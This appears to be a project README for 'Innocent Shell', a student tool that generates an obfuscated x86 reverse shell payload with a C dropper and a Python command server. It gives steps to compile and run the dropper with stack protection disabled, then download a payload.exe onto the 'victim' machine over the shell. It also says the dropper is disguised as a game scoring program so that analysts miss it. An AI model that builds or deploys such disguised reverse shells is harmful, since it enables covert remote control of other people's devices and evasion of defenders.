Innocent Shell is basically a fully integrated Obfuscated Payload Generator with a Dropper to Create a Reverse Shell on targets Device developed by Team PORT KNOCKERS :
- Muhammad Huzaifa
- Abdullah Irfan
- Aisha Irfan
The Project makes use of Python, C and x86 Assembly Languages WHERE
➡️Reverse Shell Payload has been Developed using pure x86 assembly which is then parsed to develop the dropper for client/ target
➡️Client side stager to Connect to the Server is developed using C Language.
➡️And Lastly the Server for the Reverse Shell to Connect to and Execute Commands and Getting Reply has been done using Python3.
To run the project 1st of all just clone this repository.
- Clone Repository:
git clone
After extracting the zip file you can use the following command to get the help menu for the Server.
python -h
This command can be used to check the flags and respective arguments for running server and listening for the target. You can use
- -lip --> Set Server's IP Address | -sip --> Set Client's IP Address
- In this case since we are using same machine you can use your local host
- -lport --> Set Server's Port | -sport --> Set Client's Port
- Set Server's port lip to 9999 and clients port sip to 8080
- Set Server's port lip to 9999 and clients port sip to 8080
- -nc flag --> to open a saperate netcat listener using teh same server. Use 1 to set listener to open.
Now open terminal and run the Innocent shell's server using the command below.
python -lip -lport 9999 -sip -sport 8080 -nc 1
Server should start listening for connection after successfully running this command.
Now traverse into the shell folder and use the following comand to build the dropper file.
gcc -fno-stack-protector -z execstack dropper.c -o dropper
Then use ./dropper
to run the compiled C dropper for client.
Now the server looking for the connection should have connected to the client and have output of something like this
Now you can use any command on Victim's Reverse Shell. I used wget command to downloaad a payload from my selfmade python http server using command
wget http://my localhost IP:8080/payload.exe
You can see that i have successfully downloaded my desired file into the victims system.
Reverse Shell Payload to get executed on victim's device was written using x86 assembly language and then parsed into C
As for the last but not the least part: Payload Obfuscation, the reverse shell payload was obfuscated using byte shifting and Defi Hellman Key Exchange
Mechanism to encrypt and decrypt the obfuscated payload with.
Similarly, The dropper on Clinet's Side has been developed in such a way that it depicts the program written for a game and scoring system
and user analyzing teh code cannot interpret anything malicious within the code easily.
It is clearly being stated that all the files in the repository are allowed/ available for use but only for learning purposes. We won't be responsible for any type of malicious activity done using this repository's data.